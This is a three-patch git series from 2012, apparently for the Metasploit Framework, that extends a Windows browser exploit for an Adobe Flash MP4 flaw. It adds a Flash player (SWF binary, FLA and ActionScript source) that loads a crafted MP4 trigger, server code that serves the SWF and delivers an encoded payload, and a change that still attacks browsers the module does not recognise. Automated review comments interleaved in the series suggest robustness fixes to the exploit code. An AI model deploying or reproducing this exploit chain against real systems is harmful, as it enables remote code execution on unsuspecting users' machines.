From b0db18674c06358a24b9630c17d319801d4f5f31 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Thu, 8 Mar 2012 15:05:12 -0600 Subject: [PATCH 1/3] Test out new player code --- data/exploits/mp4player.swf | Bin 0 -> 462 bytes .../windows/browser/adobe_flash_sps.rb | 29 +++++++++++++----- 2 files changed, 21 insertions(+), 8 deletions(-) create mode 100755 data/exploits/mp4player.swf diff --git a/data/exploits/mp4player.swf b/data/exploits/mp4player.swf new file mode 100755 index 0000000000000000000000000000000000000000..01f40382a92080b2323334944b6b129fa40ff7dc GIT binary patch literal 462 zcmV;<0WtnVS5pa>0ssJboNZB0Q`0~kec5c9r3DKeXL8W-=)r^I9}t*9K#LX-3Z{tS zr4!PHR?S!m6fbo*Y3V`tu(R*azJ0%>2dfSg&w*P8 zR;Hjelv4x3=?Y_w}2-xA*QpcsM=tXm)NMh@+q-vFXVsI-Y2RZ3J8#Ds&KpVF!LF1ovfK z_^5JO&QL29LjkeuaIak#vDRxTKqzX`lgBZ-tp*R_N$L5`-Sn*A*x@~iyX|NiQQ)28 z^NkT}Aa@5;@RN~M;xsh>SQ{}7;+daMHo&(K@Cb* zOWz3AkrY8qO0F!-ys7U}SKA1)s^f``G<=}s+-fBYCMst;jr>CJy|1ykm`s4#qcpa> zkT8%ez)l0kTwQ_XH5^74lub$b)G+?F05xz_=Uu79t${N1PNb%5uAcipwJq385&zcK z3ROhqN+~|p%H)X1-k)+EEEV(6C4h7E)P9k>uJ+q%Sp1Sdf1H(mul>n>;'video/mp4'}) return end + # The SWF request itself + if request.uri =~ /\.swf$/ + print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...") + send_response(cli, @swf, {'Content-Type'=>'flash/swf'}) + return + end + # Set payload depending on target p = payload.encoded @@ -140,8 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote end myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] - mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4" - swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}" + swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf" html = %Q| 
@@ -166,8 +170,17 @@ class Metasploit3 < Msf::Exploit::Remote
 def exploit
 @mp4 = create_mp4
+ @swf = create_swf
 super
 end
+
+ def create_swf
+ path = ::File.join( Msf::Config.install_root, "data", "exploits", "mp4player.swf" )
+ fd = ::File.open( path, "rb" )
+ swf = fd.read(fd.stat.size)
+ fd.close
+ return swf
+ end
 def create_mp4
 ftypAtom = "\x00\x00\x00\x20" #Size
From 3e6cbe948613cdd81b5eef52118decf8afacf162 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Thu, 8 Mar 2012 15:23:10 -0600
Subject: [PATCH 2/3] Add source code to the player
---
 data/exploits/mp4player.as | 22 ++++++++++++++++++++++
 data/exploits/mp4player.fla | Bin 0 -> 5211 bytes
 2 files changed, 22 insertions(+)
 create mode 100644 data/exploits/mp4player.as
 create mode 100755 data/exploits/mp4player.fla
diff --git a/data/exploits/mp4player.as b/data/exploits/mp4player.as
new file mode 100644
index 0000000000..a0ace07a91
--- /dev/null
+++ b/data/exploits/mp4player.as
@@ -0,0 +1,22 @@
+function randText(newLength:Number):String{
+ var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+ var alphabet:Array = a.split("");
+ var randomLetter:String = "";
+ for (var i:Number = 0; i < newLength; i++){
+ randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
+ }
+ return randomLetter;
+}
+
+var connect_nc:NetConnection = new NetConnection();
+connect_nc.connect(null);
+
+var stream_ns:NetStream = new NetStream(connect_nc);
+stream_ns.onStatus = function(p_evt:Object):Void { }
+
+
+video.attachVideo(stream_ns);
+
+stream_ns.play(randText(Math.floor(Math.random() * 8) + 4) + ".mp4");
+
+
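Review bot: `create_swf` opens the player file with `::File.open` and closes it by hand, so if `fd.stat` or `fd.read` raises the descriptor is never released; the block form closes it on every path: `swf = ::File.open( path, "rb" ) { |fd| fd.read(fd.stat.size) }` followed by `return swf`. The method also carries no comment; a one-liner such as `# Load the prebuilt player SWF from data/exploits (source: mp4player.as / mp4player.fla)` would tell the next maintainer where the binary comes from, since the source files are only added in the following patch of this series. The enclosing class continues outside the hunk.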
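Review bot: `stream_ns.onStatus` is assigned an empty handler, so every NetStream status event, including a failed load of the `.mp4`, is dropped silently; if that is intentional it deserves a comment such as `// Intentionally empty: NetStream status events are ignored` above the assignment. The file also has no header saying that it is the (apparently ActionScript 2) source for mp4player.swf, built from mp4player.fla, and that the `.swf` must be rebuilt whenever this file changes; a two-line header comment would keep the checked-in binary and its source from drifting apart. Finally, the `.mp4` name length `Math.floor(Math.random() * 8) + 4` mirrors the `rand(8)+4` used for the `.swf` name on the Ruby side, which is worth noting in a comment so the two stay in step.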
diff --git a/data/exploits/mp4player.fla b/data/exploits/mp4player.fla new file mode 100755 index 0000000000000000000000000000000000000000..5a77fb2f33c8c8dadfbb4e6c03329ab127f5fc64 GIT binary patch literal 5211 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 literal 0 HcmV?d00001 From 1271368b6f3fb0418006afadb3b43e9d614723a4 Mon Sep 17 00:00:00 2001 
From: HD Moore
Date: Thu, 8 Mar 2012 15:37:06 -0600
Subject: [PATCH 3/3] Redirect to a trailing slash to make sure relative resources load properly
---
 modules/exploits/windows/browser/adobe_flash_sps.rb | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb
index ed682ede34..50ce693493 100644
--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
 print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
 #send_not_found(cli)
 #return
- my_target = targets[0]
+ my_target = targets[1]
 end
 # The SWF requests our MP4 trigger
@@ -108,7 +108,14 @@ class Metasploit3 < Msf::Exploit::Remote
 # The SWF request itself
 if request.uri =~ /\.swf$/
 print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...")
- send_response(cli, @swf, {'Content-Type'=>'flash/swf'})
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
+ return
+ end
+
+ # Redirect to a trailing slash so relative paths work properly
+ if resource_uri != "/" and not request.uri.index("#{resource_uri}/")
+ uri = resource_uri + "/"
+ send_redirect(cli, uri)
+ return
 end
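Review bot: The fallback on the unsupported-browser path changes from `targets[0]` to `targets[1]` without a comment, and neither the commit subject (trailing-slash redirect) nor the body explains it; a bare index will silently pick the wrong entry if the `targets` array is ever reordered. Please add a comment naming the intended entry, e.g. `# Unrecognized browser: fall back to the <target name> entry (targets[1])`, or select the target by name so the dependency on array order is explicit. The `if` that this branch closes starts outside the hunk.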
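Review bot: The trailing-slash check uses `request.uri.index("#{resource_uri}/")`, which matches the resource path anywhere in the URI rather than as a prefix, and it relies on `index` returning nil for the miss case (0 is truthy in Ruby), which readers from other languages routinely misjudge. `start_with?` states the intent directly and is available on the Ruby versions the file already targets: `if resource_uri != "/" and not request.uri.start_with?("#{resource_uri}/")`. The redirect also discards any query string on the original request, which is fine for this handler but is worth a word in the comment above it. The surrounding request handler continues outside the hunk.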